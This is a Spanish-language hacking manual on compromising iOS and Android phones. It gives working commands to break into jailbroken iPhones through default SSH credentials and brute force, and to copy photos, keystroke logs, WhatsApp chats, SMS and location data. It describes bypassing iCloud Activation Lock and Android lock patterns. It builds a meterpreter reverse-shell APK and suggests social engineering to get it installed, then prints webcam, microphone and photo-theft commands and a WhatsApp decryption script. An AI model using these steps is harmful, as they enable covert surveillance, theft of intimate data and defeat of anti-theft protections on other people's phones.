certificacion hacking mexico drummerwolf

[Ttulo del documento] -Hackeo de dispositivos iOS -Hackeo de dispositivos Android -Recuperacin de datos con consola -Anlisis forense a dispositivo iOS

Manual elaborado por:

Gonzalo Snchez (Drummer Wolf)

Gonzalo Snchez Surez - Drummer Wolf 2

Hackeo de dispositivos iOS y Android

INTRODUCCIN: Explotando el sistema iOS

Hoy en da los telfonos mviles almacenan muchsima informacin nuestra, cuentas de correo, redes sociales, historial de internet...

Ha habido casos muy sonados de famosos a los que les han robado fotos ntimas de sus smartphones y las han subido a Internet sin que las vctimas se dieran cuenta de nada. Hay ms mtodos, pero lo que vas a encontrar aqu podra ser perfectamente una tcnica vlida para llevar a cabo eso.

En este paper simplemente quiero demostrar lo peligroso que es estar conectado a una red Wifi con un dispositivo iOS con OpenSSH activado. Para llevar a cabo este ataque necesitamos dos cosas en el dispositivo vctima:

. 1- Que tenga jailbreak

. 2- Que tenga instalado OpenSSH, la mayora de la gente que ha realizado jailbreak lo tiene instalado por comodidad.

El gran problema: OpenSSH sin configurar.

Mucha gente, sobre todo gente no muy familiarizada con el mundo de la seguridad informtica, se olvida de algo muy, muy importante que es cambiar la contrasea por defecto (es lo ms bsico, aunque hacer slo eso no te garantiza ser inmune a un ataque.

Datos por defecto del OpenSSH:

Usuario: root Password: alpine

A esto hay que sumarle que por defecto OpenSSH se queda activado cuando se activa el Wifi. Mucha gente lo instala y se le olvida que lo tiene ah. Eso es muy peligroso y va a ser la base de nuestro ataque.

Ya se podrn imaginar todo lo que podemos hacer entrando a un dispositivo iOS con privilegios de super-usuario ;)



T E M A 1 . E x p l o t a n d o v u l n e r a b i l i d a d a l S S H d e u n iD e v i c e c o n J a i l b r e a k

Herramientas a utilizar: -Consola -Metasploit -SQLiteManager -Nmap o Zenmap -Fing app (iOS o Android) -SSH Dispositivo con el que se realizar la prueba: -iPhone 5s (iOS 7.0.4)



1.Escaneando la red. Para poder identificar si dentro de nuestra red se encuentra conectado un dispositivo iOS al que podamos intentar vulnerar necesitaremos hacer un escaneo de la misma, para lo cual podemos usar aplicaciones conocidas como escneres de red. Haremos un escaneo con 2 herramientas muy tiles para nuestro propsito. Empezaremos con un programa llamado Zenmap, que es la GUI del conocido Nmap. (disponible para Windows, mac y Linux)



Haremos un escaneo con deteccin de sistema operativo, para lo cual seleccionaremos la opcin de Quick scan plus, en el campo target colocaremos los 2 primeros octetos de nuestra direccin IP, y reemplazaremos los 2 octetos que seguiran por asteriscos (esto para poder tener un escaneo exitoso de la red local y asignarle el rango que va a tener que escanear el programa).

Por lo general este tipo de escaneos tiende a ser un poco tardado, slo es cuestin de ser paciente y dejar que el programa haga lo suyo. Una vez terminado el escaneo, encontramos que hay un dispositivo con iOS dentro de nuestra red y que aparte est con el puerto 22 abierto corriendo el servicio de Open SSH. QUE SUERTE! :D



Como alternativa a Zenmap (Nmap) podramos usar una app llamada Fing la cual est disponible tanto en la App Store como en la Google Play Store, la cual con solo un toque empezar a escanear nuestra red local en busca de todos los dispositivos conectados a la misma. De igual forma podremos encontrar los dispositivos iOS que estn conectados.

ANDROID iOS



Una vez que tenemos nuestro target que encontramos gracias a los escaneos procederemos a utilizar el framework metasploit para intentar vulnerar el Open SSH del dispositivo. 2. Vulnerando con metasploit Iniciamos el framework metasploit:




Utilizaremos el siguiente exploit: msf > use exploit/apple_ios/ssh/cydia_default_ssh

Lo configuraremos mediante los siguientes comandos:

msf exploit(cydia_default_ssh) > show payloads

msf exploit(cydia_default_ssh) > set PAYLOAD generic/shell_reverse_tcp

msf exploit(cydia_default_ssh) > set LHOST [MI DIRECCIN IP] msf exploit(cydia_default_ssh) > set RHOST [DIRECCIN IP DE LA VCTIMA]

msf exploit(cydia_default_ssh) > show options (revisamos los ajustes del comando antes de lanzarlo



Una vez que todo est listo lanzamos el exploit:

msf exploit(cydia_default_ssh) > exploit

Podemos observar que tuvimos un login exitoso con la contrasea alpine

Lo siguiente ser acceder al ssh del dispositivo mediante la terminal con el siguiente comando:

ssh [email protected] Nos pedir la contrasea para el usuario root, la cual sabemos que es alpine y una vez dentro pondremos en la consola pwd para saber donde estamos situados:

CRACKEANDO PASSWORD OPENSSH Seguro que muchos se preguntarn, y si la vctima ha cambiado la contrasea por defecto? Si la contrasea ha sido cambiada an no est todo perdido, podemos intentar sacarla mediante un ataque por fuerza bruta. Si no se ha configurado correctamente OpenSSH (cosa que slo hacen una minora muy reducida de usuarios, seguramente por desconocimiento o simplemente por no complicarse la vida), es posible sacar las contraseas por fuerza bruta ya que por defecto OpenSSH tiene comentada la directiva #MaxAuthTries 6 (/etc/ssh/sshd_config) lo que nos viene a decir que un ataque por fuerza bruta es viable porque el nmero de intentos de login no est limitado.



Para ello podemos usar aplicaciones como Hydra aunque si la contrasea es robusta ser muy difcil de sacar. A continuacin se har un ataque de fuerza bruta al ssh del dispositivo iOS Para el ataque usaremos una herramienta llamada hydra en un versin GUI llamada xhydra, en este caso usaremos la distribucin Kali Linux.

1. Abrimos el programa teclando xhydra en la consola

2. Procedemos a configurar la primer ventana del programa introduciendo la ip vctima, el puerto, el protocolo y que muestre los intentos (opcional).



3. En la pestaa PASSWORDS configuraremos el nombre de usuario que en este caso es root y la ruta del archivo de diccionario que usaremos para el ataque.

4. Las siguientes pestaas las dejaremos tal y como estn y enseguida nos

dirigiremos a la pestaa de START y lanzaremos el ataque, si este llega a ser exitoso con algn password de la lista que utilizamos el programa nos lo indicar de inmediato.



3. Postexplotacin Una vez estando dentro del dispositivo vctima podremos hacer muchas cosas. Dentro de este curso daremos un recorrido rpido por las acciones ms comunes que se podran realizar desde un punto de vista de un hacker malicioso. Tecleando help dentro de la consola nos aparecern una serie de comandos que podremos usar dentro de nuestro dispositivo, sin embargo, no vamos a profundizar en cada uno de ellos ya que es una lista larga.



-Reiniciar el springboard (explorador de archivos por defecto)

-Reiniciar el dispositivo

Mediante estos comandos se reiniciar el explorador de archivos por defecto de iOS o el dispositivo mismo, segn sea el caso. Lo cual despus de realizar provocar que el dispositivo se vea algo mas o menos as.

Configurando el SSH: Para hacer esta documentacin mas completa incluir a continuacin una forma rpida de activar ese servidor en la distribucin Kali Linux y Mac OS X ya que esta herramienta nos servir para extraer los archivos del dispositivo vulnerado. OK, empecemos con la configuracin del servidor SSH. En mi caso estar usando una mquina virtual de Kali Linux.



Primero necesitars verificar si tu mquina tiene activo algn servicio de SSH activo, para lo cual pondremos el siguiente comando en la consola:

root@Kali:~# service --status-all Si SSH muestra un signo negativo - significa que no est activo o no est instalado

Ahora escribimos root@kali~:# apt-get install openssh-server desde la terminal para instalar el servidor y openssh-client para instalar el cliente

En este caso ya estaba instalado previamente el servidor y el cliente. Para iniciar los servicios SSH pondremos en la consola root@kali~# service ssh start y para

checar que el servicio est activo pondremos root@kali~# service ssh status



Listo, con eso tenemos el servidor SSH funcionando en Kali Linux -Iniciar el servidor SSH en Mac OS X: Abriremos Preferencias del sistema, enseguida daremos click en el panel de Compartir y habilitaremos la pestaa de Sesin remota y listo!, el servidor SSH ya est funcionando en tu Mac.



Ahora empezaremos por visitar los directorios interesantes dentro del dispositivo:

1. Fotos y videos Desde la siguiente ruta podemos ver todas las fotos y vdeos almacenados en el dispositivo. /private/var/mobile/Media/DCIM/100APPLE Te gustara robar alguna foto del dispositivo? VAMOS A ELLO! Una vez dentro de la ruta de fotos y videos podremos obtener todos los que queramos simplemente usando el comando para transferencia de archivos mediante SSH como mencionamos anteriormente. Accediendo a la ruta que mencionamos anteriormente, mediante un ls nos mostrar los nombres de los archivos contenidos en la carpeta, en este caso robaremos la ltima foto tomada por el usuario.

Por comodidad abriremos otra ventana de consola y enseguida pondremos el siguiente comando: scp -r [[usuario root del iOS]] @[[direccin ip del ssh de la vctima]]:/ruta/del/archivo/que/queremos/extraer.JPG /ruta/donde/lo/pegaremos Quedando en este ejemplo algo as: scp -r [email protected]:/private/var/mobile/Media/DCIM/101APPLE/IMG_1959.JPG /Users/drummerwolf/desktop/hack

Una vez terminada la transferencia revisamos nuestra carpeta de destino donde elegimos guardar la foto y listo, de la misma forma pueden seguir robando mas fotos o videos:



2. Keylogger Algo muy interesante, iOS almacena en texto plano una especie de registro con las palabras usadas, algo sin duda muy til si estamos en busca de contraseas ;) La ruta donde se encuentra estos archivos es: /private/var/mobile/Library/Keyboard/es_ES-dynamic-text.dat y dentro de ella podremos encontrar los archivos es_ES-dynamic-text.dat y dynamic-text.dat Usaremos el mismo comando del ejemplo pasado para extraer los archivos y veamos que contienen.



Abriendo el archivo con un editor de texto nos muestra en texto plano las palabras que se han escrito desde el teclado del dispositivo (por privacidad esta imagen la puse borrosa)

3. Navegador Web (Safari) En la siguiente ruta podremos encontrar el historial de navegacin de safari y con ello muchos datos que pueden resultar interesantes: /private/var/mobile/Library/Safari/History.plist En versiones recientes de iOS ese archivo ya no se encuentra en esa ruta, sin embargo, an podemos encontrar la base de datos de los marcadores con el nombre de Bookmarks.db



Una vez extraido el archivo segn sea el caso, lo abriremos con un gestos de bases SQLite y observaremos algo as:

4. Base de datos Whats App Mucho ha dado que hablar ltimamente WhatsApp sobre el tema de seguridad y es que WhatsApp almacena la informacin en iOS en una base de datos SQLite que se encuentra en la siguiente ruta con lo que cualquiera podra ver con quin hemos chateado, lo que hemos escrito etc. Para abrir la base de datos he utilizado SQLite Manager. /private/var/mobile/Applications/(cadena que vara)/Documents/ChatStorage.sqlite *Lo que se refiere a la cadena que vara es un valor alfanumrico que el sistema le asigna a las carpetas que contienen a las aplicaciones, guardndolas de esta forma dentro del sistema y no con sus nombres originales* En este caso la cadena que corresponde a la carpeta donde est la app de whats app (en el caso de mi dispositivo) es la siguiente: C09C0065-B57C-4DF7-BB4A-6A397EA72474



Y aqu un ejemplo de cmo se ve la base de datos de las conversaciones:

Si seguimos mirando ms tablas podemos ver todo: contactos, nmeros de telfono, mensajes enviados y recibidos, las fechas.... Tambien encontramos que hay otra base sqlite con todos los contactos en la misma ruta pero con el nombre de Contacts.sqlite



Tambin podremos usar una herramienta web para interpretar la base de datos sqlite sin necesidad de tener un programa. En la pgina de http://www.recovermessages.com podremos subir nuestra bd y se generarn las tablas con la informacin correspondiente y lo mejor es que no solo nos sirve para interpretar la base de datos del whatsapp sino tambin las bases de: WhatsApp Android, WhatsApp IPhone, Tuenti IPhone, SpotBros IPhone, Line IPhone, SMS Android, SMS IPhone, EMails Android, EMails IPhone.



5. Twitter En el siguiente archivo podemos obtener datos datos como nombre de usuario en twitter, ltimas bsquedas y tweets... /private/var/mobile/Applications/(ruta que vara)/Library/Preferences\com.atebits.Tweetie2.plist

6. SMS (iPhone) /private/var/mobile/Library/SMS sms.db

7. Localizaciones /private/var/root/Library/Caches/locationd/consolidate.db

8. Mails /private/var/mobile/Library/Mail

9. Preferencias de aplicaciones /private/var/mobile/Library/Preferences

10. Lista de contactos /private/var/mobile/Library/AddressBook

Y muchas ms rutas!!! Esto es solo un pequeo ejemplo de algunas cosas que podemos ver. Por supuesto hay muchas ms rutas y si las mirsemos todas estaramos aqu un buen rato as que aqu slo les dej algunas de las ms interesantes, si quieren obtener mas, sera cuestin de que ustedes mismos investiguen.



TEMA 2. Borrado de la cuenta iCloud

Mucho se ha hablado sobre la posibilidad de quitar el famoso sistema de seguridad dentro de iOS 7 que consiste en el bloqueo del equipo que corra dicho sistema mediante la cuenta iCloud del usuario dueo. En muchos sitios en internet se especula sobre diversos mtodos y herramientas para lograr burlar o desactivar este bloqueo. En las siguientes pginas se mostrarn algunos de ellos, as como, los bugs dentro de iOS 7 que te permitirn borrar las cuentas de iCloud sin necesidad de usar ningn tipo de tolos. 2.1 Mtodo hackt ivate (compatible nicamente con iPhone 4) Este mtodo se basa en la utilizacin de una herramienta que mediante el uso del modo DFU del iPhone 4 se explota una vulnerabilidad en el procesador del dispositivo teniendo la posibilidad de instalarle el servidor ssh y de esa forma borrar los archivos de configuracin donde se encuentra almacenada la cuenta iCloud. Cabe aclarar que este mtodo se realizar dentro del sistema operativo Windows. EMPECEMOS!

1. Debers desactivar tu antivirus & firewall o de lo contrario tu computadora borrar los archivos necesarios para continuar con el proceso. Una vez

terminado el desbloqueo si tu gustas puedes desisnstalar la herramienta utilizada sin ningn contratiempo (si no, tu antivirus lo har).



2. Descarga e instala la tool iOS Soft Dev Pack + JB iOS 7.1 V2 y ejectala. (para realizar la instalacin de la tool es necesario contar con .net framework 3.5 o superior instalado)

Seleccionamos

y enseguida seleccionaremos la primera opcin.

3. Conecta tu iPhone en modo DFU (apretando los botones de encendido y home al mismo tiempo durante 10 segundos, soltamos el botn de

encendido despus de 2 segundos y seguimos apretando el botn de home

durante otros 30 segundos), despus de esto el programa detectar tu

dispositivo e iniciar con la explotacin.



4. Una vez terminada la explotacin, aparecern unas letras verdes de que fue exitoso, posteriormente sleccionaremos la segunda opcin que se encargar de hacer la coneccin al ssh. (Si por alguna razn al realizar este

paso les llega a marcar un error que diga algo como could not moun

system simplemente vulvan a dar click a la opcin 2.)

5. Procedemos a dar click en la opcin 3 para ejecutar la hacktivate tool



6. Una vez terminado el proceso anterior el iPhone se pondr en modo de recuperacin y solo tendrn que pulsar la opcin 4 para salir del mismo.

Como una recomendacin les aconsejo desinstalar la herramienta utilizada para

todo el proceso. Si realizaron todos los pasos correctamente ahora podrn configurar su iPhone

como si fuera un dispositivo nuevo, Felicidades!!!



Uno de las consecuencias conocidas por la realizacin del mtodo hacktivate es

que el iPhone se quedar sin la posibilidad de conectarse a las redes celulares. Algn precio se tena que pagar por semejante activacin, no todo es miel sobre

hojuelas.

2.2 Borrado de cuenta iCloud mediante bug en iOS versiones 7.0.4 7.0.6 y 7.1 (compatible con iPhone 4,4s,5 y 5s)

Muchas veces me han preguntado si es posible borrar la cuenta iCloud de un iPhone sin necesidad de la contrasea y si este no tiene algn patrn de bloqueo

o no se ha intentado restaurar anteriormente. La respuesta es SI, si por azares del

destino te llegaron a vender un iPhone y el dueo anterior no le borr su cuenta

de iCloud pero te lo dej sin patrn de desbloqueo ser posible para ti explotar esta vulnerabilidad dentro de iOS 7.0.4 , 7.0.6 y 7.1

-Borrando cuenta iCloud en iOS 7.1 en iphone 4 y 4s Nos dirigiremos a configuracin y posteriormente a la pestaa de iCloud

No es un mtodo fcil de reproducir, ya que hay que sincronizar la peticin de

"borrar cuenta" junto con el botn de Deshabilitar Find My iPhone al mismo

tiempo. Una vez que se pida la contrasea, es necesario apagar y volver a encender el dispositivo. Una vez hecho esto, se podr borra la cuenta de Apple

iCloud sin contrasea. Se detalla un poco en las capturas a continuacin.



Como se menciona en el texto anterior, se tiene que seleccionar al mismo tiempo las opciones de desactivar Find my iPhone y Delete Account

Posteriormente aparecer una pantalla como esta donde parecieran estar amontonadas las opciones de desactivar Find my iPhone con la de borrar la cuenta iCloud, felicidades, si te apareci algo como esto lo nico que tienes que hacer es reiniciar el dispositivo, (en este punto podremos notar que la opcin de Find my iPhone ya se encuentra desactivada) nos dirigiremos de nuevo a la configuracin de iCloud y ahora seleccionaremos Eliminar cuenta si lo notas ahora no nos pedir la contrasea de la cuenta iCloud para eliminarla e incluso la medida de seguridad conocida como Activation Lock tambin desaparecer.



-Borrando cuenta iCloud en iOS 7.0.6 en iphone 5, 5c y 5s Accedemos a la configuracin del dispositivo y en la pestaa de iCloud, este glitch es algo complicado de reproducir, se requiere que primero deslices con el dedo la opcin de desactivar Find my iPhone y sin soltarlo aprietes el botn de borrar cuenta, algo as.

El botn del switch se quedar a medias

Posteriormente presionaremos Delete Account, enseguida Delete otra vez, muy importante, durante la animacin en la que aparece la segunda opcin para confirmar el borrado de la cuenta es necesario mover el switch de find my iPhone como si lo fueramos a DESACTIVAR, y una vez presionado Delete from My iPhone hacer lo mismo. Cuando el sistema te pida la contrasea daremos en cancel y si hiciste bien el procedimiento ahora el switch de Find my iPhone quedar parcialmente desactivado



Lo siguiente que tendremos que hacer ser entrar a la pestaa de la cuenta iCloud donde se encuentra el correo y la contrasea. Borraremos el password y la palabra iCloud y apretaremos en done, nos mandar un mensaje de error y repetiremos este procedimiento 2 veces en total. Una vez terminado daremos en cancel

Enseguida volveremos a entrar a esa pestaa y escribiremos en el espacio que qued en blanco la palabra iCloud y listo, cuando quieran borrar la cuenta iCloud del dispositivo no deber ser necesario introducir la contrasea.



-Borrando cuenta iCloud en iOS 7.0.4 en iphone 4, 4s, 5, 5c y 5s Accedemos a la configuracin del dispositivo y en la pestaa de iCloud accedemos a los datos de la cuenta, borramos el password y tecleamos cualquier palabra, apretamos done, cuando nos aparezca el mensaje de contrasea incorrecta daremos en OK y enseguida en Cancel

Volvemos a entrar a la pestaa per ahora borraremos la palabra iCloud y dejaremos el espacio en blanco, una vez que apretemos done podremos observar que el switch de Find my iPhone estar desactivado y que incluso podremos borrar la cuenta iCloud sin necesidad de la contrasea



MODULO 2: Hackeo de dispositivos Android Tema 1: Bypass al patrn de desbloqueo Herramientas a ut i l izar: -adb bundle -consola Disposit ivo en el que se real izar la prueba: -Xperia Pro mk16a (android 4.0.4 con root)



En este mdulo se detallar como lograr un bypass al patrn de desbloqueo de un mobil con android. Un requisito para que este mtodo sea exitoso es que el mobil est rooteado y tenga el debbuging mode encendido. Por lo general hay un gran porcentaje de personas que al hacerle root a sus dispositivos dejan el modo debugging encendido y lo olvidan por completo, esto puede representar una amenaza (o una ventaja) dependiendo del uso que le quieran dar a este mtodo, ya sea para saltarse el patrn de desbloqueo en caso de que lo hayan olvidado o para saltrselo en caso de ser una persona con malas intenciones hacia el dispositivo. Primero instalaremos el adb de android que es la herramienta utilizada por los desarrolladores de la plataforma para diferentes propsitos, en este caso, nos enfocaremos en borrar los archivos que contienen la informacin correspondiente al patrn de bloqueo.

1.1 Instalacin de adb bundle

Kal i L inux: Para instalar adb bundle dentro de kali Linux tendremos que descargar el paquete desde la web oficial http://dl.google.com/android/adt/22.6.2/adt-bundle-linux-x86_64-20140321.zip y descomprimirlo, de preferencia lo dejaremos en la carpeta inicial del sistema, en mi caso lo puse en /root Posteriormente tendremos que instalar unos paquetes necesarios para que lo podamos ejecutar sin problemas, abrimos terminal y teclearemos lo siguiente: dpkg --add-architecture i386 apt-get update apt-get install ia32-libs apt-get install lib32ncurses5 A estas alturas ya debes poder ejecutar el software sin problemas, sin embargo, para facilitarnos la vida crearemos las variables de entorno para ejecutar el software sin importar la ruta en la que estemos situados, para lo cual teclearemos el siguiente comando en la consola: export PATH=${PATH}:/usuario/ruta/android-sdk/tools:/usuario/ruta/android-sdk/platform-tools



IMPORTANTE: La ruta puede variar dependiendo en donde hayan descomprimido el archivo, revisen muy bien la ruta de su carpeta de platform-tools para que las variables de entorno sean creadas correctamente.

Mac osx: Descargaremos el paquete oficial desde la web de android http://dl.google.com/android/adt/22.6.2/adt-bundle-mac-x86_64-20140321.zip , de igual forma lo descomprimiremos dentro de nuestra carpeta de usuario, en este caso la ma es /Users/drummerwolf/android Crearemos nuestra variables de entorno: 1. Primero debemos crear un fichero para el usuario actual. Para ello abrimos el terminal y nos posicionamos en la carpeta Home. (/Users/XXX/) Una vez dentro ejecutamos el siguiente comando: touch .bash_profile Esto nos generar un fichero con el mismo nombre. Ahora abrimos el fichero con el editor de texto, para ello ejecutamos el siguiente comando: open -e .bash_profile Aqu agregamos la ruta a nuestro adb dentro del directorio de nuestro paquete de android descargado anteriormente: export PATH=${PATH}:/Android/adt-bundle-mac/sdk/platform-tools Esto nos permitir utilizar el comando adb, desde cualquier sitio en Terminal. Ahora reiniciamos las variables de entorno con: source .bash_profile



Hecho!, ya tenemos nuestra variable de entorno agregada. Para comprobarlo ejecuta: echo $PATH Ah estarn.

Windows: Descargamos el paquete oficial en el link http://developer.android.com/sdk/index.html?hl=sk#win-bundle seleccionamos nuestro paquete correspondiente a la arquitectura de nuestro procesador si este es de 32 o 64 bits. Lo descomprimimos y renombramos la carpeta a algo mas simple como android esto nos facilitar ms el crear nuestras variables de entorno. Una vez teniendo la carpeta la moveremos al directorio raz de nuestra unidad de disco duro, en este caso mi ruta sera C: Nos dirigiremos a men de inicio: click derecho en equipo>propiedades configuracin avanzada del sistema

cl ick en variables de entorno



En la caja inferior buscaremos la variable Path y editar

En el cuadro en la opcin de Valor de la variable nos posicionaremos al f inal de la l nea y aadiremos el siguiente texto: ;C:\android\sdk\platform-tools

Damos click en aceptar y LISTO, ahora puedes teclear los comandos de adb dentro de smbolo del sistema sin ningn problema.



1.2 Bypass al patrn de desbloqueo de android usando adb 1. Primero verificaremos que nuestro equipo sea reconocido tecleando adb devices una vez que hayamos conectado nuestro equipo a la computadora mediante el cable usb.

2. Iniciaremos una Shell en el dispositivo tecleando adb Shel l y enseguida tecleamos su para tener permisos de superusuario.

3. Nos dirigiremos a la ruta /data/system/ y una vez ah dentro podremos observar que existen varios archivos, entre ellos se encuentra el que contiene la configuracin del patrn de desbloqueo, este archivo puede llamarse gesture.key o ( locksett ings.db, locksett ings.db-wal y locksett ings.db-shm) lo que haremos ser borrarlo con el comando rm y enseguida el nombre y extensin del archivo.



4. Reiniciamos el dispositivo tecleando reboot

5. Listo, el patrn de desbloqueo ha sido borrado y una vez reiniciado el dispositivo basta con que hagas un toque en la pantalla de desbloqueo o simplemente deslices tu dedo y tendrs acceso al dispositivo.



Tema 2: Ataque a disposit ivos Android con metasploit En este tema haremos una explotacin a un dispositivo Android por medio de una aplicacin (.apk) creada mediante el framework de metasploit. 1. Iniciamos abriendo nuestra consola de Metasploit

2. Verificamos los exploits y mdulos disponibles teclando search android :

Si contamos con los payloads correspondientes a android podremos continuar, de lo contrario necesitaremos actualizar metasploit. Enseguida empezaremos el procedimiento para crear un .apk con infeccin para obtener una Shell meterpreter de manera local y remota.



1.-Entramos en la carpeta de instalacin de metasploit , en este caso la ruta de instalacin en mi computadora es la siguiente /opt/msf.

2. Tengamos en cuenta los datos de conexin que usaremos para la creacin de nuestra .apk. IP DEL ATACANTE : 10.210.45.38 (mi ip)

PUERTO ATACANTE : 6789

3. Una vez en la carpeta de instalacin de Metasploit usaremos el siguiente comando ./msfpayload android/meterpreter/reverse_tcp LHOST=IP_LOCAL/NO-IP LPORT=PUERTO R > /RUTA/nombre_de_la_app.apk ./msfpayload android/meterpreter/reverse_tcp LHOST=10.210.45.38 LPORT=6789 R > /Users/Drummerwolf/Desktop/hack/ hacking_mexico.apk 4. La .apk ha sido creada



5. En este caso para la explotacin usaremos un dispositivo Android xperia pro modelo mk16a.

6. Instalacin del .apk infectado Esta es la parte mas esencial para la explotacin, ser necesario que el atacante tenga la suficiente creatividad y sea muy bueno aplicando la ingeniera social. Una de las formas puede ser mandar por correo la aplicacin, convencer a la vctima que con esta aplicacin tendr internet 3g gratis, que esta aplicacin hace mas rpido su dispositivo, etc etc. Incluso si nos furamos mas a fondo podramos hacer la decompilacin de la .apk e introducir su cdigo dentro de alguna otra aplicacin cualquiera, por ejemplo, introducir el cdigo de la .apk infecciosa dentro del cdigo de wifi test auditor (app para sacar claves wifi) subirla a play store o subirla a algn servicio como mega, dropbox etc y difundirla para que esta sea instalada pensando que es como cualquier otra app inofensiva. Este paso lo dejar a la creatividad y habilidad del lector.



7. El proceso de instalacin de la .apk infectada ser como el de cualquier otra aplicacin.

8. Continuamos Posicionados en la carpeta de instalacin y procedemos a ejecutar el siguiente comando. ./msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=IP_LOCAL/NO-IP LPORT=PUERTO E

./msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=10.210.45.38 LPORT=6789 E

(Si la app fue ejecutada dentro del dispositivo infectado debemos tener xito al ejecutar el comando)

Para darnos una idea de lo que podemos ejecutar dentro de la Shell meterpreter teclearemos el comando help



meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands ============================ Command Description



------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description



------- ----------- execute Execute a command getuid Get the user that the server is running as ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam Comando webcam_list , para listar las cmaras web en el dispositivo.

Comando webcam_snap , para tomar una foto en tiempo real con el dispositivo.



Comando ifconfig , para revisar las interfaces de red y la mac address del equipo.

Comando record_mic , para grabar audio con el dispositivo :

Comando ps , para listar los procesos que estn corriendo en el dispositivo.



Comando ls , para listar los archivos.

Comando pwd , para ver en que carpeta o phat estamos posicionados.

Ahora robaremos algunas fotos: Nos posicionamos en la ruta /mnt/sdcard/DCIM/100ANDRO que es donde en este caso mi dispositivo almacena las fotos



Ahora descargaremos una foto a nuestro escritorio mediante el comando download.

meterpreter > download 01.jpg /Users/drummerwolf/Desktop/hack/ meterpreter > download 01.jpg /tu_/ruta/

As como robamos la base de datos de whatsapp en el iPhone lo haremos con la de Android, sin embargo, a diferencia de iOS la base de datos almacenada dentro de Android se encuentra encriptada y para eso usaremos un sencillo comando de OpenSSL para poder desencriptarla

Para usuarios de sistemas basados en UNIX es necesario tener OpenSSL instalado: Abrimos una terminal, nos situamos en la ruta donde tenemos nuestro archivo de base de datos con terminacin .crypt y escribimos el siguiente comando openssl enc -d -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K 346a23652a46392b4d73257c67317e352e3372482177652c

En donde in va a corresponder al nombre del archive de nuestra base que descargamos, -out sera el nombre del archivo que le daremos de salida y K sera la llave universal que se usa para desencriptar la base de datos



Para las versiones mas nuevas de Whatsapp la base de datos se encuentra encriptada de forma diferente y esta tiene una terminacin .crypt5 Para lograr desencriptarla usaremos un scrypt en python , sin embargo, para que este tenga xito ser necesario que sepamos la cuenta gmail asiociada a la terminal android Para usarlo es tan sencillo como invocarlo as: - python pwncrypt5.py msgstore.db.crypt5 (cuenta de la vctima)@gmail.com > msgstore.sdb Y finalizo con el codiciado cdigo:

pwncrypt5.py



#!/usr/bin/python """ 48bits presents: 8===============================================D~~~ WhatsApp msgstore crypt5 decryptor by grbnz0 and nullsub 8===============================================D~~~ """ import sys import hashlib import StringIO from M2Crypto import EVP key = bytearray([141, 75, 21, 92, 201, 255, 129, 229, 203, 246, 250, 120, 25, 54, 106, 62, 198, 33, 166, 86, 65, 108, 215, 147]) iv = bytearray([0x1E,0x39,0xF3,0x69,0xE9,0xD,0xB3,0x3A,0xA7,0x3B,0x44,0x2B,0xBB,0xB6,0xB0,0xB9]) def decrypt(db,acc): fh = file(db,'rb') edb = fh.read() fh.close() m = hashlib.md5() m.update(acc) md5 = bytearray(m.digest()) for i in xrange(24): key[i] ^= md5[i&0xF] cipher = EVP.Cipher('aes_192_cbc', key=key, iv=iv, op=0) sys.stdout.write(cipher.update(edb)) sys.stdout.write(cipher.final()) if __name__ == '__main__': if len(sys.argv) != 3: print 'usage %s > decrypted.db' % sys.argv[0] else: decrypt(sys.argv[1],sys.argv[2])



Una de las alternatvas para poder desencriptar la base de datos es usando el sitio web https://www.recovermessages.com el cual har todo el proceso por nosotros, sin embargo, si queremos ver la base de datos completa ser necesario hacer un pequeo pago.

Si buscan un mtodo mas fcil para desencriptar

Se ha sacado esta muy til herramienta para desencriptar las bases de whatsapp con terminacin .cryp5 compatible con Windows

La descargaremos del siguiente enlace https://github.com/andreas-mausch/whatsapp-viewer/releases/download/v1.3/WhatsApp.Viewer.zip

Una vez descargado el ejecutable, copiaremos nuestra base de datos obtenida dentro de la misma carpeta, ejecutaremos el programa, click en file>open y seleccionaremos el archivo



Escribiremos la cuenta asociada a la terminal android y de esa forma podremos abrir el archivo

Listo! Nuestra base de datos ha sido desencriptada y lista para ser leida



Explotacin Remota (tutorial por Juan Angel Osorio Juarez m4ku4z)2

La explotacin Remota consiste en poder infectar un dispositivo android , no importa en que estado de la republica o pas se encuentre , con este tipo de explotacin podremos obtener la sesin de meterpreter remota.

Conociendo nuestra infraestructura (proveedor de servicio , Modem , Velocidad de conexin)

Para poder hacer la explotacin remota debemos conocer bien nuestra infraestructura de red y de proveedor de servicio de internet.

-Modem

modelo y conocer la entrada al panel de la configuracin

-Ethernet o WIFI?

Cable rj45 o inalmbrico

-Conexin

De forma opcional debemos hacer una prueba de conexin para saber a cuantos megas navegamos.

Suponiendo que contamos con un modem 2wire de Telmex y conociendo que es inalmbrico , procederemos a abrir los puertos mediante una sencilla configuracin.



Por lo regular la configuracin del modem es a travs de la ip 192.168.1.254 (obviamente debemos estar conectados)

Abrimos nuestro navegador y nos dirigimos a la direccin 192.168.1.254 en algunos mdems nos pedir el usuario , el cual es Telmex y la contrasea es la clave wep.



Ingresamos a la administracin del modem .

Entramos a la configuracin de Bloqueo de Intrusos.



En este ejemplo la computadora del lado derecho llamada Makuaz-Private es la que esta conectada a la red , ah puede ser tu equipo y debes identificarlo con el nombre que le hayas puesto a tu pc .

